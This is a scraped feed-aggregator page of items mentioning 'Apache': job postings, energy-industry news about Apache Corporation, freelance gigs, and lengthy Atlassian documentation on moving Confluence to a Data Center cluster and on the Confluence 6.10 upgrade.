
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, WebLogic, Java, JavaScript, jQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, IIS, etc. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Big Data Hadoop Online Training      Cache   Translate Page   Web Page Cache   
Sacrostect offers a Big Data Hadoop training course that lets you master the concepts of the Hadoop framework and prepares you for Cloudera's CCA175 Big Data certification. With this online Hadoop training, you'll learn how the components of the Hadoop ecosystem, such as Hadoop 2.7, YARN, MapReduce, HDFS, Pig, Impala, HBase, Flume, Apache Spark, and so on, fit into the Big Data processing lifecycle.
          Apache Corporation and Kayne Anderson Acquisition Corp. Announce...      Cache   Translate Page   Web Page Cache   
  • Anchored by Apache's gathering, processing and transportation assets at Alpine High, Altus Midstream will be a publicly traded, pure-play, Permian Basin midstream C-corp.
          Kafka in publishing      Cache   Translate Page   Web Page Cache   
The internal technical architecture of the New York Times newsroom

See also other posts about Kafka


          Network and Systems Administrator - UPA - Longueuil, QC      Cache   Translate Page   Web Page Cache   
Apache and Tomcat web servers; MySQL and SQL Server database servers; Exchange and Symantec mail servers;...
From UPA - Fri, 20 Jul 2018 22:08:49 GMT - View all Longueuil, QC jobs
          Please update cakephp2 to 3 on the air.      Cache   Translate Page   Web Page Cache   
One website developed with CakePHP and MySQL (MariaDB). I need help updating CakePHP 2.5 to CakePHP 3.6. PHP 7.1, Debian 8.7, Apache 2.4. I will give you a remote login account with root. Please tell me how... (Budget: $30 - $250 USD, Jobs: CakePHP, Debian, MySQL, PHP)
          Rep. Doggett Asks for Release of S.A. Dreamer Detained Near the Occupy ICE Camp      Cache   Translate Page   Web Page Cache   
U.S. Rep. Lloyd Doggett has asked Immigration and Customs Enforcement to parole the 18-year-old Dreamer it picked up last Friday near San Antonio's Occupy ICE camp.

Doggett, a Democrat representing San Antonio and Austin, submitted a formal letter Wednesday on behalf of Sergio Salazar Gonzalez, known to protesters at the camp as "Mapache."…
          PySpark Cookbook      Cache   Translate Page   Web Page Cache   

eBook Details: Paperback: 330 pages Publisher: WOW! eBook (June 29, 2018) Language: English ISBN-10: 1788835360 ISBN-13: 978-1788835367 eBook Description: PySpark Cookbook: Combine the power of Apache Spark and Python to build effective big data applications

The post PySpark Cookbook appeared first on eBookee: Free eBooks Download.


          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 01 Aug 2018 01:21:56 GMT - View all Seattle, WA jobs
          Moving to Confluence Data Center      Cache   Translate Page   Web Page Cache   

Page edited by Michelle Mortimer - "Published by Scroll Versions from space DOCM and version 6.10"

This page outlines the process for migrating an existing Confluence Server (non-clustered) site to Confluence Data Center (clustered).

If you're installing Confluence for the first time (you don't have any existing Confluence data to migrate), see Installing Confluence Data Center.

If you want to switch back to a non-clustered solution, see Moving from Data Center to Server.

Your Confluence license determines the type of Confluence you have: Server or Data Center. Confluence will auto-detect the license type when you enter your license key, and automatically prompt you to begin the migration.

Before you begin

Clustering requirements

To run Confluence in a cluster you must:

  • Have a Data Center license (you can purchase a Data Center license or create an evaluation license at my.atlassian.com)
  • Use a supported external database, operating system and Java version
  • Use a load balancer with session affinity and WebSockets support in front of the Confluence cluster
  • Have a shared directory accessible to all cluster nodes in the same path (this will be your shared home directory)
  • Use OAuth authentication if you have application links to other Atlassian products (such as Jira)

Supported platforms

See our Supported Platforms page for information on the database, Java, and operating systems you'll be able to use. These requirements are the same for Server and Data Center deployments. See Confluence Data Center Technical Overview for important hardware and infrastructure considerations.

We also have specific guides and deployment templates to help you running Confluence Data Center in AWS or Azure. Check them out to find out what's required.

Terminology

In this guide we'll use the following terminology:

  • Installation directory – The directory where you installed Confluence on a node.
  • Local home directory – The home or data directory on each node (in non-clustered Confluence this is simply known as the home directory).
  • Shared home directory – The directory you created that is accessible to all nodes in the cluster via the same path. 
  • Synchrony home directory – The directory where you configure and run Synchrony from (this may be on a Confluence node, or on its own node).

At the end of the installation process, you'll have an installation directory and a local home directory on each node, plus a single shared home directory (a total of five directories in a two-node cluster) for Confluence, as well as directories for Synchrony. 

Set up Data Center

1. Upgrade Confluence Server 

If you plan to upgrade Confluence as part of your migration to Data Center, you should upgrade your existing Confluence Server site as the first step.  

2. Apply Data Center license 

  1. Go to  > General Configuration > License Details
  2. Enter your new Confluence Data Center license key.
  3. You'll be prompted to stop Confluence to begin the migration.

 

At this stage your home directory (configured in confluence/WEB-INF/classes/confluence-init.properties) should still be pointing to your existing (local) home directory.

3. Create a shared home directory 

  1. Create a directory that's accessible to all cluster nodes via the same path. The directory should be empty. This will be your shared home directory. 
  2. In your existing Confluence home directory, move the contents of <confluence home>/shared-home to the new shared home directory you just created.

    To prevent confusion, we recommend deleting the empty <confluence home>/shared-home directory once you've moved its contents.
  3. Move your attachments directory to the new shared home directory (skip this step if you currently store attachments in the database). 
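The shared home steps above can be sketched in shell. The paths here are illustrative placeholders, not your real Confluence layout, and the sketch fakes an existing local home so it is self-contained:

```shell
# Illustrative sketch only: paths are examples, not a real installation.
LOCAL_HOME=/tmp/demo-confluence-home      # stand-in for <confluence home>
SHARED_HOME=/tmp/demo-shared-home         # stand-in for the new shared home

# Demo setup: fake an existing <confluence home>/shared-home with some content
mkdir -p "$LOCAL_HOME/shared-home"
touch "$LOCAL_HOME/shared-home/config-item"

# 1. Create the (empty) shared home directory, accessible to all nodes
mkdir -p "$SHARED_HOME"

# 2. Move the contents of <confluence home>/shared-home across,
#    then delete the now-empty directory to prevent confusion
mv "$LOCAL_HOME/shared-home/"* "$SHARED_HOME"/
rmdir "$LOCAL_HOME/shared-home"
```

In a real migration the shared home would sit on shared storage (NFS, for example) mounted at the same path on every node.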

4. Start Confluence

The setup wizard will prompt you to complete the migration by entering:

  • A name for your cluster
  • The path to the shared home directory you created earlier
  • The network interface Confluence will use to communicate between nodes
  • How you want Confluence to discover cluster nodes:

    • Multicast – enter your own multicast address or automatically generate one.
    • TCP/IP – enter the IP address of each cluster node.
    • AWS – enter your IAM Role or secret key, and region.
    • AWS - enter your IAM Role or secret key, and region.
       

      AWS node discovery...

      We recommend using our Quick Start or Cloud Formation Template to deploy Confluence Data Center in AWS, as it will automatically provision, configure and connect everything you need.

      If you do decide to do your own custom deployment, you can provide the following information to allow Confluence to auto-discover cluster nodes:

      • IAM Role or Secret Key – This is your authentication method. You can choose to authenticate by IAM Role or Secret Key.
      • Region – This is the region your cluster nodes (EC2 instances) will be running in.
      • Host header – Optional. This is the AWS endpoint for Confluence to use (the address where the EC2 API can be found, for example 'ec2.amazonaws.com'). Leave blank to use the default endpoint.
      • Security group name – Optional. Use to narrow the members of your cluster to only resources in a particular security group (specified in the EC2 console).
      • Tag key and Tag value – Optional. Use to narrow the members of your cluster to only resources with particular tags (specified in the EC2 console).
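Whichever discovery mode you choose, the wizard records it in <local home>/confluence.cfg.xml. As a rough sketch (the values below are examples, and you should rely on what the wizard writes rather than hand-editing from memory), TCP/IP discovery ends up looking something like:

```xml
<!-- Sketch only: example cluster name and node IPs, not a drop-in config -->
<property name="confluence.cluster">true</property>
<property name="confluence.cluster.name">my-cluster</property>
<property name="confluence.cluster.join.type">tcp_ip</property>
<property name="confluence.cluster.peers">172.22.52.12,172.22.49.34</property>
```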

Once you've confirmed that Confluence is running, stop Confluence so you can set up Synchrony (required if you want to continue to use collaborative editing).  

Set up Synchrony

5. Set up a Synchrony cluster

In this example, we assume you'll run Synchrony in its own cluster.
 

  1. Grab the <install-directory>/bin/synchrony directory from your first Confluence node and move it to your Synchrony node.  We'll call this your <synchrony-home> directory.
  2. Copy synchrony-standalone.jar from your Confluence local home directory to your <synchrony-home> directory. 
  3. Copy your database driver from your Confluence <install-directory>/confluence/WEB-INF/lib to your <synchrony-home> directory or other appropriate location on your Synchrony node.
  4. Edit the <synchrony-home>/start-synchrony.sh or start-synchrony.bat file and enter details for the parameters listed under Configure parameters.
    See Configuring Synchrony for Data Center for more information on the required parameters and some optional properties that you can also choose to specify.
  5. Start Synchrony, then head to 
    http://<SERVER_IP>:<SYNCHRONY_PORT>/synchrony/heartbeat
    to check that Synchrony is available
  6. Copy your <synchrony-home> directory to each Synchrony node. As each node joins you'll see something like this in your console.

    Members [2] {
    	Member [172.22.52.12]:5701
    	Member [172.22.49.34]:5701 
    }
    
  7. Configure your load balancer for Synchrony.
    Your load balancer must support WebSockets (for example NGINX 1.3 or later, Apache httpd 2.4, IIS 8.0 or later). SSL connections must be terminated at your load balancer so that Synchrony can accept XHR requests from the web browser. 
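As a concrete illustration, a minimal NGINX sketch of the Synchrony proxy might look like the following. The upstream addresses reuse the example node IPs from the console output above, and the port and paths are assumptions to adapt:

```nginx
# Minimal sketch; assumes two Synchrony nodes listening on port 8091
upstream synchrony {
    server 172.22.52.12:8091;
    server 172.22.49.34:8091;
}

server {
    listen 443 ssl;           # SSL terminates at the load balancer, as required
    # ssl_certificate / ssl_certificate_key directives go here

    location /synchrony {
        proxy_pass http://synchrony;
        proxy_http_version 1.1;                    # required for WebSockets
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "Upgrade";
    }
}
```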

6. Start Confluence on Node 1

In this example, we assume you use the same load balancer for Synchrony and Confluence, as shown in Configuring Synchrony for Data Center.

  1. Start Confluence on node 1 and pass the following system property to Confluence to tell Confluence where to find your Synchrony cluster.

    -Dsynchrony.service.url=http://<synchrony load balancer url>/synchrony/v1

    For example http://yoursite.example.com/synchrony/v1. You must include /v1 on the end of the URL.

    If Synchrony is set up as one node without a load balancer, use the following instead:

    -Dsynchrony.service.url=http://<synchrony ip or hostname>:<synchrony port>/synchrony/v1

    For example http://42.42.42.42:8091/synchrony/v1 or http://synchrony.example.com:8091/synchrony/v1

    You may want to add this system property to your <install-directory>/bin/setenv.sh or setenv.bat so it is automatically passed every time you start Confluence. See Configuring System Properties for more information on how to do this in your environment.

  2. Head to  > General Configuration > Collaborative editing to check that this Confluence node can connect to Synchrony. 

    Note: to test creating content you'll need to access Confluence via your load balancer.  You can't create or edit pages when accessing a node directly.
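To make the system property from step 1 permanent, a line like the following could be added to <install-directory>/bin/setenv.sh (the URL is the placeholder from above, not a real endpoint):

```shell
# setenv.sh fragment (sketch): prepend the Synchrony URL to the JVM options
CATALINA_OPTS="-Dsynchrony.service.url=http://yoursite.example.com/synchrony/v1 ${CATALINA_OPTS}"
```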

Add more Confluence nodes

7. Copy Confluence to second node

To copy Confluence to the second node:

  1. Shut down Confluence on node 1
  2. Shut down your application server on node 2, or stop it from automatically loading web applications
  3. Copy the installation directory from node 1 to node 2
  4. Copy the local home directory from node 1 to node 2
    If the file path of the local home directory is not the same on nodes 1 and 2 you'll need to update the <installation directory>/confluence/WEB-INF/classes/confluence-init.properties file on node 2 to point to the correct location.

Copying the local home directory ensures the Confluence search index, the database and cluster configuration, and any other settings are copied to node 2.

8. Configure load balancer

Configure your load balancer for Confluence. You can use the load balancer of your choice, but it needs to support session affinity and WebSockets.

SSL connections must be terminated at your load balancer so that Synchrony can accept XHR requests from the web browser.

You can verify that your load balancer is sending requests correctly to your existing Confluence server by accessing Confluence through the load balancer and creating a page, then checking that this page can be viewed/edited by another machine through the load balancer.

9. Start Confluence one node at a time

You must only start Confluence one node at a time. The first node must be up and available before starting the next one.

  1. Start Confluence on node 1
  2. Wait for Confluence to become available on node 1
  3. Start Confluence on node 2
  4. Wait for Confluence to become available on node 2.

The Cluster monitoring console ( > General Configuration > Clustering) shows information about the active cluster.

When the cluster is running properly, this page displays the details of each node, including system usage and uptime. Use the menu to see more information about each node in the cluster.

10. Test your Confluence cluster

Remember, to test creating content you'll need to access Confluence via your load balancer.  You can't create or edit pages when accessing a node directly.

A simple process to ensure your cluster is working correctly is:

  1. Access a node via your load balancer, and create a new document on this node
  2. Ensure the new document is visible by accessing it directly on a different node
  3. Search for the new document on the original node, and ensure it appears
  4. Search for the new document on another node, and ensure it appears

If Confluence detects more than one instance accessing the database, but not in a working cluster, it will shut itself down in a cluster panic. This can be fixed by troubleshooting the network connectivity of the cluster.


Security

Ensure that only permitted cluster nodes are allowed to connect to a Confluence Data Center instance's Hazelcast port (which defaults to 5801) or Synchrony's Hazelcast port (which defaults to 5701) through the use of a firewall and / or network segregation.
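One way to sketch this with iptables (the node IPs are the example addresses from the console output earlier, and the 5801/5701 defaults are as stated above; run as root and adapt to your network):

```shell
# Sketch: allow only known cluster nodes to reach the Hazelcast ports,
# then drop everything else. Example node IPs only.
for node_ip in 172.22.52.12 172.22.49.34; do
    iptables -A INPUT -p tcp -s "$node_ip" --dport 5801 -j ACCEPT  # Confluence Hazelcast
    iptables -A INPUT -p tcp -s "$node_ip" --dport 5701 -j ACCEPT  # Synchrony Hazelcast
done
iptables -A INPUT -p tcp --dport 5801 -j DROP
iptables -A INPUT -p tcp --dport 5701 -j DROP
```

Network segregation (a dedicated cluster VLAN or security group) achieves the same goal and is often easier to audit.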

Troubleshooting

If you have problems with the above procedure, please see our Cluster Troubleshooting guide.

If you're testing Confluence Data Center by running the cluster on a single machine, please refer to our developer instructions on Starting a Confluence cluster on a single machine.


          Apache, Kayne ink $3.5bn Permian midstream deal      Cache   Translate Page   Web Page Cache   
Pipeline company to be anchored by US independent's Alpine High assets
          Disney Will Use James Gunn's Script for Guardians of the Galaxy Vol. 3      Cache   Translate Page   Web Page Cache   
Warner Bros. is already pursuing James Gunn while Disney decides whether it will use his script for Guardians of the Galaxy Vol. 3.
          Setup and configure Linux servers      Cache   Translate Page   Web Page Cache   
I am a busy freelancer who needs an extra pair of hands. I need an experienced Linux system admin to do the tasks below: - Set up Ubuntu servers - Separate existing web apps into production and development... (Budget: $30 - $250 USD, Jobs: Amazon Web Services, Apache, Linux, System Admin, Ubuntu)
          Pickleball      Cache   Translate Page   Web Page Cache   
(South 8th and Apache streets). Loaner paddles are available if you don’t have one. Follow these topics:
          Aggregated Audit Logging With Google Cloud and Python      Cache   Translate Page   Web Page Cache   

In this post, we will be aggregating all of our logs into Google BigQuery Audit Logs. Using big data techniques we can run our audit log aggregation in the cloud.

Essentially, we are going to take some Apache2 server access logs from a production web server (this one in fact), convert the log file line-by-line to JSON data, publish that JSON data to a Google PubSub topic, transform the data using Google DataFlow, and store the resulting log file in Google BigQuery long-term storage. It sounds a lot harder than it actually is.
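The log-to-JSON step can be sketched in a few lines of awk. This is a hypothetical sketch, not the post's actual pipeline: it assumes Common Log Format input and made-up JSON field names:

```shell
# Sketch: convert Apache access log lines (Common Log Format) to JSON,
# one object per line. Field names are illustrative.
log_to_json() {
  awk '{
    gsub(/\[/, "", $4)    # strip the leading "[" from the timestamp field
    gsub(/"/, "", $6)     # strip the quote from the request method
    printf "{\"ip\":\"%s\",\"time\":\"%s\",\"method\":\"%s\",\"path\":\"%s\",\"status\":%s,\"bytes\":%s}\n",
      $1, $4, $6, $7, $9, $10
  }'
}

# Example: feed one sample log line through the converter
echo '127.0.0.1 - - [10/Oct/2000:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326' | log_to_json
```

In practice you would pipe the access log into this and publish each JSON line to the PubSub topic, e.g. with the `gcloud pubsub topics publish` CLI or a client library.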


          Application Developer      Cache   Translate Page   Web Page Cache   
NY-NEW YORK CITY, A leading healthcare company is seeking a strong Big Data/Business Intelligence developer. Qualifications: 3+ years of business intelligence development experience. Must have expertise in the Hadoop ecosystem. Knowledge of BI tools and statistical packages such as SAS, R or SciPy/NumPy. Knowledge of Apache Hadoop, Apache Spark (including PySpark), Spark Streaming, Kafka, Scala, Python, MapReduce, YARN
          (USA-NJ-Franklin Lakes) Associate Software Packaging Engineer      Cache   Translate Page   Web Page Cache   
**POSITION SUMMARY**

The associate IT engineer will service day-to-day operational engineering requests from product teams, project teams, and operational customers. The associate IT engineer will also work with guidance of other team members to design, develop, and implement capabilities that advance the roadmap and vision of the Monitoring Engineering team and its partners. Candidate will be required to administer various monitoring platforms, work within existing processes, and ensure compliance of monitoring solutions with corporate standards. The candidate will also assist in optimizing operational practices and assessing progress through data-driven metrics.

**ESSENTIAL FUNCTIONS**

  • Coordinate and facilitate meetings with application and system teams to determine monitoring needs
  • Coordinate and interpret monitoring needs and ensure all requests for monitoring follow a standard workflow
  • Design, develop, document, and deploy monitoring requests into the various monitoring systems within the ESI enterprise
  • Design, develop, document, and deploy standard reporting for all monitoring platforms within the ESI enterprise
  • Adhere to standard change control criteria before monitors are moved into production
  • Act as a liaison between business and technical teams and the ESI CMEA and NOC management
  • Coordinate with other support teams to ensure all monitoring tools are configured into an organized package for use by the ESI Central Monitoring
  • Administer and support tooling and associated infrastructure including version and lifecycle management, patching, break-fix support, and administrative tasks

**QUALIFICATIONS**

  • Bachelor's Degree required
  • 2-5 years of relevant work experience
  • 1-3 years of experience in Monitoring, System Administration, Networking, or similar technology
  • Conceptual understanding of monitoring capabilities at all levels including asset, utility, application, and business insight
  • Minimum 1 year experience in implementing, maintaining, and supporting enterprise-class monitoring solutions in a large and heterogeneous environment
  • Experience evaluating, implementing, and administering Application Performance Management solutions such as CA APM (Wily Introscope) and Riverbed's APM Xpert Tool Suite
  • Must have experience with BMC Portal/Patrol; experience with BMC ProactiveNet Performance Manager (BPPM) and TMART
  • Must have experience with SolarWinds Orion Network Performance Manager
  • Must have experience with HP SiteScope and HP LoadRunner scripting
  • Experience with monitoring of virtual server environments is a plus
  • Working knowledge of security and security concepts, firewalls and anti-virus
  • Working knowledge of standard industry web servers (Apache, IIS, etc.), Java containers (JBoss, MuleSoft, WebSphere, WebLogic, Tomcat, etc.)
  • Working knowledge of database monitoring techniques (DB2, Microsoft SQL Server, and Oracle)
  • Working knowledge of security architectures, HTTP/HTTPS, SSL, LDAP, HTML, web servers: Apache, IIS
  • Working knowledge of application platforms (IBM WebSphere, MuleSoft, Tomcat, and .NET)
  • Prior experience with cloud-based platforms and cloud-native application architectures is desirable
  • Working knowledge of networking: TCP/IP, and familiarity with firewalls, hubs, routers, switches, DNS, gateways, load balancing and basic network analysis/troubleshooting
  • Working knowledge of various scripting languages such as Shell/PERL/PHP/HTML/XML/SOAP/REST/JavaScript/AutoHotKey/Selenium WebDriver
  • Working knowledge of monitoring-related network and systems management protocols such as HTTP/HTTPS, SNMP, RDP, SSH, LDAP, WMI, IMAP/POP, ICMP, FTP, TELNET, SMTP, DNS, etc., and how to monitor their health and efficiency
  • Foundational knowledge and experience with VMware/ESX, VMS and physical hardware
  • Familiarity with key servers/encryption, PKI/certificates, Java, APIs, and browsers
  • Exposure to architectural concepts such as SOA, ITIL, SOFEA, etc.

**ABOUT THE DEPARTMENT**

Do you enjoy making things work seamlessly and figuring out ways to improve functionality? Do you have a knack for automating processes? Be a part of our team that focuses on reliability and keeping our systems running. From data centers to servers, this talent is relied on to create and maintain critical platforms for the organization. If this is your skill set and you want to be at the center of work that impacts 83 million Americans, explore our opportunities.

**ABOUT EXPRESS SCRIPTS**

Advance your career with the company that makes it easier for people to choose better health. Express Scripts is a leading healthcare company serving tens of millions of consumers. We are looking for individuals who are passionate, creative and committed to creating systems and service solutions that promote better health outcomes. Join the company that Fortune magazine ranked as one of the "Most Admired Companies" in the pharmacy category. Then, use your intelligence, creativity, integrity and hard work to help us enhance our products and services. We offer a highly competitive base salary and a comprehensive benefits program, including medical, prescription drug, dental, vision, 401(k) with company match, life insurance, paid time off, tuition assistance and an employee stock purchase plan. Express Scripts is committed to hiring and retaining a diverse workforce. We are an Equal Opportunity Employer, making decisions without regard to race, color, religion, sex, national origin, age, veteran status, disability, or any other protected class. Applicants must be able to pass a drug test and background investigation. Express Scripts is a VEVRAA Federal Contractor.
          If you did not already know      Cache   Translate Page   Web Page Cache   
Apache Calcite Apache Calcite is a dynamic data management framework. It contains many of the pieces that comprise a typical …

Continue reading


          NN Investment Partners Holdings N.V. Lowers Position in Apache Co. (APA)      Cache   Translate Page   Web Page Cache   
NN Investment Partners Holdings N.V. reduced its holdings in Apache Co. (NYSE:APA) by 36.0% in the second quarter, according to the company in its most recent Form 13F filing with the SEC. The institutional investor owned 121,612 shares of the energy company’s stock after selling 68,470 shares during the quarter. NN Investment Partners Holdings N.V.’s […]
          Technical Webmaster - UNESCO Institute for Statistics - Montréal, QC      Cache   Translate Page   Web Page Cache   
Act as primary resource to oversee and maintain the UIS online presence including the UIS website and microsites (Drupal, Apache, IIS, Solr) intranet... $3,418 a month
From UNESCO Institute for Statistics - Wed, 25 Jul 2018 00:18:23 GMT - View all Montréal, QC jobs
          Apache to Form Midstream Business in Deal With 'Blank-Check...      Cache   Translate Page   Web Page Cache   
 By Josh Beckerman 

Apache Corp. (APA) is forming Permian Basin midstream energy business Altus Midstream Co. via a deal with a blank-check company, contributing nearly all of its gathering, processing and transportation assets at the Alpine High formation in West Texas.

Kayne...

          Confluence 6.10 Upgrade Notes      Cache   Translate Page   Web Page Cache   

Page edited by Rachel Robins - "Added known issue for confluence.cfg.xml"

Here are some important notes on upgrading to Confluence 6.10. For details of the new features and improvements in this release, see the Confluence 6.10 Release Notes.

Upgrade notes

Confluence 6 is a major upgrade

If you're upgrading from Confluence 5.x, be sure to read these upgrade notes thoroughly, take a full backup, and test your upgrade in a non-production environment before upgrading your production site.

Tomcat 9 upgrade  

In this release we've upgraded Apache Tomcat from version 8 to 9. Some things you should be aware of:

  • Tomcat 9 supports HTTP/2, but Confluence does not yet support this protocol. 
  • Tomcat 9 introduces support for multiple TLS virtual hosts for a single connector with each virtual host supporting multiple certificates. We haven't tested this with Confluence yet, and have made no changes to the sample connectors in Confluence's server.xml file. We may introduce some changes in future releases. 

As usual, we recommend upgrading your test or staging site before upgrading your production site to Confluence 6.10, particularly if you've made significant changes to your server.xml. It's also good practice to re-apply modifications, rather than just copying over your old server.xml.

If you're running Confluence as a service, you may need to:

  • reinstall the service, if you've upgraded Confluence manually
  • reapply any system properties or JVM flags you may be passing via the service. 

Search improvements

In this release we fixed a number of issues relating to search. Some of the fixes will only apply to newly created or edited content, until you next reindex your site. 

Additional memory requirements for Data Center

As mentioned in the release notes, you should make sure that each Confluence node in the cluster has at least 2GB free memory to cater for the sandboxes.

Supported platforms changes

In this release we've:

  • Added support for Microsoft SQL Server 2016

Update configuration files after upgrading

The contents of configuration files such as server.xml, web.xml, setenv.bat, setenv.sh and confluence-init.properties change from time to time. 

When upgrading, we recommend manually reapplying any additions to these files (such as proxy configuration, datasource, JVM parameters) rather than simply overwriting the file with the file from your previous installation, otherwise you will miss out on any improvements we have made.

Upgrading from Confluence 5.x?

Collaborative editing is made possible by the magic of Synchrony. When you install Confluence Server, Synchrony will be configured to run as a separate process on your server.

If you're upgrading from Confluence 5.x, there are a few requirements you need to be aware of:

Collaborative editing requirements...
  • Memory and CPU: You may need to give your server more resources than for previous Confluence releases. When you install Confluence, Synchrony (which is required for collaborative editing), will be configured to run as a separate process on your server. The default maximum heap size for Synchrony is 1 GB (on top of Confluence's requirements). 
  • WebSockets: Collaborative editing works best with WebSockets. Your firewall / proxy should allow WebSocket connections. 
  • SSL termination: SSL should be terminated at your load balancer, proxy server, or gateway as Synchrony does not support direct HTTPS connections. 
  • Database drivers: You must use a supported database driver. Collaborative editing will fail with an error if you're using an unsupported or custom JDBC driver (or driverClassName in the case of a JNDI datasource connection). See Database JDBC Drivers for the list of drivers we support.
  • Database connection pool: your database must allow enough connections to support both Confluence and Synchrony (which defaults to a maximum pool size of 15). 

Infrastructure changes 

For developers

Head to Preparing for Confluence 6.10 to find out more about changes under the hood. 

End of support announcements

No announcements. 

Known issues

Upgrade procedure

Note: Upgrade to a test environment first. Test your upgrades in your test environment before rolling them into production.

If you're already running a version of Confluence, please follow these instructions to upgrade to the latest version:

  1. Go to > Support Tools > Health Check to check your license validity, application server, database setup and more.
  2. Before you upgrade, we strongly recommend that you back up your installation directory, home directory and database.
  3. If your version of Confluence is earlier than 6.5, read the release notes and upgrade guides for all releases between your version and the latest version.
  4. Download the latest version of Confluence.
  5. Follow the instructions in the Upgrade Guide.
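The directory backups in step 2 can be scripted. This is a minimal sketch (the paths in the usage comment are examples only; the database must be backed up separately with your database's own tools, e.g. pg_dump or mysqldump):

```python
import shutil
import time

def backup_dir(src, dest_prefix):
    # Zip a Confluence directory (installation or home) with a timestamp
    # so repeated upgrade attempts don't overwrite earlier backups.
    stamp = time.strftime('%Y%m%d-%H%M%S')
    return shutil.make_archive('%s-%s' % (dest_prefix, stamp), 'zip', src)

# e.g. backup_dir('/var/atlassian/confluence-home', '/backups/confluence-home')
```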

Checking for known issues and troubleshooting the Confluence upgrade

After you have completed the steps required to upgrade your Confluence installation, check all the items on the Confluence post-upgrade checklist to ensure that everything works as expected. If something is not working correctly, please check for known Confluence issues and try troubleshooting your upgrade as described below:

  • Check for known issues. Sometimes we find out about a problem with the latest version of Confluence after we have released the software. In such cases we publish information about the known issues in the Confluence Knowledge Base.
  • Check for answers from the community. Other users may have encountered the same issue. You can check for answers from the community at Atlassian Answers.
  • Did you encounter a problem during the Confluence upgrade? Please refer to the guide to troubleshooting upgrades in the Confluence Knowledge Base.

If you encounter a problem during the upgrade and can't solve it, please create a support ticket and one of our support engineers will help you.


#traffic - wsphotobus
VIAÇÃO GATO PRETO 8 213 - @caioinduscaroficial Apache VIP I Mercedes Benz OF-1722M #bus #buses #onibus #onibusbrasil #autobus #Omnibus #InstaBusologos #Instabus #instabuslovers #busmania #Urbano #busologia #transportepublico #buslovers #transportation #busphotography #olharesdesampa #igers #instagood #brasil #nofilter #transport #publictransport #traffic #instaphoto #instalike #saopaulo #saopaulocity #photo #mercedesbenz
A search operation was carried out at Pavón
  As part of the implementation of the anti-crime work plan in the prisons, the security search operation was ordered by the authorities of the Ministerio de Gobernación; in the capital, the director of the penitentiary system, Camilo Morales Castro, gave details of the security search operation, which was […]
Document automation - Intranet to create custom Word document based on user specified data - Upwork
Create a web page on our CMS (Ubuntu/Apache/Drupal) which will gather text data via direct input user form or from a user-specified Drupal entity and insert the data obtained into a group of Word documents and a single Excel spreadsheet.  The Word documents are pre-assembled but require only the insertion of the gathered data into the XML or via links in the document to be complete.  The excel spreadsheet will have only the key data entered by the user or taken from a data source specified by the user.  We prefer to avoid VBA if possible due to pop-up warnings.

We use Drupal 8 so if you can do this with a Drupal 8 plug in or custom code, that would be best.  

Once this works properly there will be ongoing work to maintain it as needed.
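For background, the Word side of this task needs no VBA at all: a .docx file is a ZIP archive whose body text lives in word/document.xml, so gathered data can be substituted into placeholder tokens directly. The sketch below is illustrative only (the {name}-style token convention is an assumption, and the poster ultimately wants this wrapped in a Drupal 8 module):

```python
import zipfile

def fill_docx(template_path, output_path, values):
    # A .docx file is a ZIP archive; the visible text lives in
    # word/document.xml. Copy every member, substituting {placeholder}
    # tokens in the body along the way.
    with zipfile.ZipFile(template_path) as src, \
         zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == 'word/document.xml':
                text = data.decode('utf-8')
                for key, val in values.items():
                    text = text.replace('{%s}' % key, val)
                data = text.encode('utf-8')
            dst.writestr(name, data)
```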

Budget: $200
Posted On: August 09, 2018 02:31 UTC
ID: 213902493
Category: Web, Mobile & Software Dev > Web Development
Skills: HTML, jQuery, PHP
Country: Turks and Caicos Islands
Comment on Lethal Weapon: Replacing Clayne Crawford “Wasn’t Our Choice” Says Fox Chair by Apache
Sean William Scott is good for another American Pie. I watched the show because of Crawford and Damon's partnership. Bring him back; it's gonna suck with Stifler. Nothing he makes ever works. You just messed up my show lineup... bring him back.
With Carlos Tevez out, Mauro Zárate sealed Boca's win and proved the Mellizo right
Zárate, the former Vélez player and the coach's choice over the Apache, scored Boca's second goal in the win over Libertad. "Sometimes the ball-hog play works out for me," he quipped.
Carlitos Tevez and Susana Giménez in Fuerte Apache: Telefe Specials 2018, 15.08.18

SUSANA GIMÉNEZ AND CARLITOS TEVEZ

FROM FUERTE APACHE

The most anticipated comeback takes place: Susana Giménez and the first of her specials of the year.


PySpark Cookbook

eBook Details:
Paperback: 330 pages
Publisher: WOW! eBook (June 29, 2018)
Language: English
ISBN-10: 1788835360
ISBN-13: 978-1788835367
eBook Description: PySpark Cookbook: Combine the power of Apache Spark and Python to build effective big data applications



Application Developer
NY-NEW YORK CITY, A leading healthcare company is seeking a strong Big Data/Business Intelligence developer Qualifications 3+ years of business intelligence development experience Must have expertise in the Hadoop ecosystem Knowledge of BI tools and statistical packages such as SAS, R or SciPy/NumPy Knowledge of Apache Hadoop, Apache Spark (including pyspark), Spark streaming, Kafka, Scala, Python, MapReduce, Yarn
Scala/Spark Engineer/Developer
OH-Columbus, job summary: Senior Developers with significant experience using Apache Spark. This position will be located in our headquarters in Columbus, Ohio. Technologies and Tools We Use to Build Solutions: Java, JavaScript, CSS, Angular JS, Scala/Spark, Python, Redis, JBoss/Wildfly, Jetty, Spring, REST, Node, Gulp, Maven, Eclipse, IntelliJ, SQL, Linux, Gerrit/Git, Jenkins, Junit, Ruby, Cucumber, Protracto
Fullstack Java Developer
